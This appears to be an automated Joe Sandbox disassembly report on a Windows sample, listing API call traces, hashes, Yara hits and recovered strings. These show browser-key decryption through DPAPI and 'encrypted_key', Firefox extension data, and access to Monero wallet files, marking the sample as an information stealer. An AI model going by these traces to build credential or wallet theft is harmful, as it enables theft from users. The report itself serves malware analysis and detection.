                                • Opcode ID: 0eb79d3f6723788b916a3843c3e357e7edb96dfe720696aadbb291452554af70
                                • Instruction ID: 84b794e73488781468c7c111b019136475ef88fb40e4fed276abdbf3786c8887
                                • Opcode Fuzzy Hash: 0eb79d3f6723788b916a3843c3e357e7edb96dfe720696aadbb291452554af70
                                • Instruction Fuzzy Hash: 2841DC71C002489ADB18EBA0D895BEDB7B4EF10300F44512AE516B6291EF742B8BDF95
                                APIs
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00EC9F41
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$AllocLocal
                                • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                • API String ID: 4171519190-1096346117
                                • Opcode ID: d2dd673fe85a03deef686a9ea220c814166c10460c8fe28d128779a948ba2109
                                • Instruction ID: 5b0b3c7a5ae89631ec78b0a31a22998e85df8962f60ffee03f5064a74a9a2a33
                                • Opcode Fuzzy Hash: d2dd673fe85a03deef686a9ea220c814166c10460c8fe28d128779a948ba2109
                                • Instruction Fuzzy Hash: DF615F31A1024C9FDB24EFA4CD96FED77B5AF44344F049129F90A6B281DBB06B46CB51
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,00DAD950,00000000,00020119,?), ref: 00ED40F4
                                • RegQueryValueExA.ADVAPI32(?,00DAE328,00000000,00000000,00000000,000000FF), ref: 00ED4118
                                • RegCloseKey.ADVAPI32(?), ref: 00ED4122
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED4147
                                • lstrcat.KERNEL32(?,00DAE178), ref: 00ED415B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                • Opcode ID: a046fdb63e412b8f0fbe5af9f619a59d11eb4fc045440a6fc354d0479dbc0340
                                • Instruction ID: 4653ba3682d7714859aa34de1a53eb740e2d19298504ee33e7183627950c4efd
                                • Opcode Fuzzy Hash: a046fdb63e412b8f0fbe5af9f619a59d11eb4fc045440a6fc354d0479dbc0340
                                • Instruction Fuzzy Hash: BA419CB6D0020867DB29EBB0EC46FEE737DAB48300F00455DB62557185EAB59BC98BD1
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 00ED696C
                                • sscanf.NTDLL ref: 00ED6999
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00ED69B2
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00ED69C0
                                • ExitProcess.KERNEL32 ref: 00ED69DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$System$File$ExitProcesssscanf
                                • String ID:
                                • API String ID: 2533653975-0
                                • Opcode ID: 9f8665494cc0dc38a0593c4f793506ed7956c79d4557125eb3b7ead11abe8e88
                                • Instruction ID: ea42297eb98378be1c3b73732eb9733252b4062d175a8ae2cb366d377da38f83
                                • Opcode Fuzzy Hash: 9f8665494cc0dc38a0593c4f793506ed7956c79d4557125eb3b7ead11abe8e88
                                • Instruction Fuzzy Hash: 4221EB75D00208ABCF09EFE4E945AEEB7B9FF48300F04852AE416F3244EB745605CB69
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED7E37
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED7E3E
                                • RegOpenKeyExA.ADVAPI32(80000002,00D9C048,00000000,00020119,?), ref: 00ED7E5E
                                • RegQueryValueExA.ADVAPI32(?,00DAD690,00000000,00000000,000000FF,000000FF), ref: 00ED7E7F
                                • RegCloseKey.ADVAPI32(?), ref: 00ED7E92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 007fdf27ef563ed927eeecfe17581f288b63970d9869bb27744a120ae13f486e
                                • Instruction ID: 5268385cbab7b6c70f15a156a76aecaa4c50749789d7f306e1b3ecb5bc295736
                                • Opcode Fuzzy Hash: 007fdf27ef563ed927eeecfe17581f288b63970d9869bb27744a120ae13f486e
                                • Instruction Fuzzy Hash: E71191B1E44309EBD714CF94E849FBBBBB8EB44701F10412AFA15A7284D7B459418BA0
                                APIs
                                • StrStrA.SHLWAPI(00DADE00,?,?,?,00ED140C,?,00DADE00,00000000), ref: 00ED926C
                                • lstrcpyn.KERNEL32(0110AB88,00DADE00,00DADE00,?,00ED140C,?,00DADE00), ref: 00ED9290
                                • lstrlen.KERNEL32(?,?,00ED140C,?,00DADE00), ref: 00ED92A7
                                • wsprintfA.USER32 ref: 00ED92C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpynlstrlenwsprintf
                                • String ID: %s%s
                                • API String ID: 1206339513-3252725368
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EC12B4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EC12BB
                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00EC12D7
                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00EC12F5
                                • RegCloseKey.ADVAPI32(?), ref: 00EC12FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00ED6663
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00ED6726
                                • ExitProcess.KERNEL32 ref: 00ED6755
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                • String ID: <
                                • API String ID: 1148417306-4251816714
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00EE0E28,00000000,?), ref: 00ED882F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED8836
                                • wsprintfA.USER32 ref: 00ED8850
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00ED951E,00000000), ref: 00ED8D5B
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED8D62
                                • wsprintfW.USER32 ref: 00ED8D78
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesswsprintf
                                • String ID: %hs
                                • API String ID: 769748085-2783943728
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00ED8B60: GetSystemTime.KERNEL32(00EE0E1A,00DAA5F0,00EE05AE,?,?,00EC13F9,?,0000001A,00EE0E1A,00000000,?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00ED8B86
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ECA2E1
                                • lstrlen.KERNEL32(00000000,00000000), ref: 00ECA3FF
                                • lstrlen.KERNEL32(00000000), ref: 00ECA6BC
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                • DeleteFileA.KERNEL32(00000000), ref: 00ECA743
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00ED8B60: GetSystemTime.KERNEL32(00EE0E1A,00DAA5F0,00EE05AE,?,?,00EC13F9,?,0000001A,00EE0E1A,00000000,?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00ED8B86
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ECD481
                                • lstrlen.KERNEL32(00000000), ref: 00ECD698
                                • lstrlen.KERNEL32(00000000), ref: 00ECD6AC
                                • DeleteFileA.KERNEL32(00000000), ref: 00ECD72B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00ED8B60: GetSystemTime.KERNEL32(00EE0E1A,00DAA5F0,00EE05AE,?,?,00EC13F9,?,0000001A,00EE0E1A,00000000,?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00ED8B86
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ECD801
                                • lstrlen.KERNEL32(00000000), ref: 00ECD99F
                                • lstrlen.KERNEL32(00000000), ref: 00ECD9B3
                                • DeleteFileA.KERNEL32(00000000), ref: 00ECDA32
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 3b81270923d76abf63ab3fbf89ffa8338b909adbcfaad8e6175354b61c24d99c
                                • Instruction ID: 45f8ac930968496ce7a1746254836c21a437def7d9409ba49dd1e5458950e2d8
                                • Opcode Fuzzy Hash: 3b81270923d76abf63ab3fbf89ffa8338b909adbcfaad8e6175354b61c24d99c
                                • Instruction Fuzzy Hash: 408151768101089ACB08FBA0DD96EEE7378EF54300F44513AF417B2291EF746B4ADB62
                                APIs
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EC99EC
                                  • Part of subcall function 00EC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EC9A11
                                  • Part of subcall function 00EC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EC9A31
                                  • Part of subcall function 00EC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EC148F,00000000), ref: 00EC9A5A
                                  • Part of subcall function 00EC99C0: LocalFree.KERNEL32(00EC148F), ref: 00EC9A90
                                  • Part of subcall function 00EC99C0: CloseHandle.KERNEL32(000000FF), ref: 00EC9A9A
                                  • Part of subcall function 00ED8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00ED8E52
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00EE1580,00EE0D92), ref: 00ECF54C
                                • lstrlen.KERNEL32(00000000), ref: 00ECF56B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 998311485-3310892237
                                • Opcode ID: a797e3e3f278d507f75977f49c6cb9a52d07c1a9fd7a5807732e638ad4b17850
                                • Instruction ID: 97afd8ec6b1fd8a934fca77b287fdb62ead127e5b8de0fea638f3b59a9be8880
                                • Opcode Fuzzy Hash: a797e3e3f278d507f75977f49c6cb9a52d07c1a9fd7a5807732e638ad4b17850
                                • Instruction Fuzzy Hash: 95512376D001489ADB08FBA4DC96DED73B8EF54300F44953AF81677291EE34670ACBA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID: s$s$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 3722407311-3520659465
                                • Opcode ID: ec0047636a6c2d88c6da4ae463c6a20a61ad42c025cade08de0ee82a2d50f2b0
                                • Instruction ID: 01bf683ec5473fe4b8b965b81cd58d8f7b0c52105203ee103c2df5665d163628
                                • Opcode Fuzzy Hash: ec0047636a6c2d88c6da4ae463c6a20a61ad42c025cade08de0ee82a2d50f2b0
                                • Instruction Fuzzy Hash: A8518FB0D042189BDB24EB90DD86BEEB3B4EF44304F1461AAE55576281EB742F8ACF54
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: a867ce30521605b9ef954b3da6c786a56e3ed380d3195f3d70868f8ad1435529
                                • Instruction ID: df85a4c0d6135e13eb02b3ec62cc819eca79860ad73eec40c24911913339505e
                                • Opcode Fuzzy Hash: a867ce30521605b9ef954b3da6c786a56e3ed380d3195f3d70868f8ad1435529
                                • Instruction Fuzzy Hash: AB414F75D10209AFCB04EFA5D845AEEB7B4EF44304F04902AE41677390DB75AB46CFA2
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EC99EC
                                  • Part of subcall function 00EC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EC9A11
                                  • Part of subcall function 00EC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EC9A31
                                  • Part of subcall function 00EC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EC148F,00000000), ref: 00EC9A5A
                                  • Part of subcall function 00EC99C0: LocalFree.KERNEL32(00EC148F), ref: 00EC9A90
                                  • Part of subcall function 00EC99C0: CloseHandle.KERNEL32(000000FF), ref: 00EC9A9A
                                  • Part of subcall function 00ED8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00ED8E52
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00EC9D39
                                  • Part of subcall function 00EC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EC9AEF
                                  • Part of subcall function 00EC9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00EC4EEE,00000000,?), ref: 00EC9B01
                                  • Part of subcall function 00EC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EC9B2A
                                  • Part of subcall function 00EC9AC0: LocalFree.KERNEL32(?,?,?,?,00EC4EEE,00000000,?), ref: 00EC9B3F
                                  • Part of subcall function 00EC9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00EC9B84
                                  • Part of subcall function 00EC9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00EC9BA3
                                  • Part of subcall function 00EC9B60: LocalFree.KERNEL32(?), ref: 00EC9BD3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2100535398-738592651
                                • Opcode ID: 5e2328794461d9ab846a471d73f41ae632c73efdc3d051fa8859aa5cfcbd4043
                                • Instruction ID: 659ff7dfa8ec0df26517fab28c8f35cd013c92cdda0850365e534295fc28fd14
                                • Opcode Fuzzy Hash: 5e2328794461d9ab846a471d73f41ae632c73efdc3d051fa8859aa5cfcbd4043
                                • Instruction Fuzzy Hash: 613150B6D10209ABCB04DBE4DD89FEEB7B8AF48304F14551DE902B7242E7319A05CBA1
                                APIs
                                • __getptd.LIBCMT ref: 00EDC74E
                                  • Part of subcall function 00EDBF9F: __amsg_exit.LIBCMT ref: 00EDBFAF
                                • __getptd.LIBCMT ref: 00EDC765
                                • __amsg_exit.LIBCMT ref: 00EDC773
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00EDC797
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
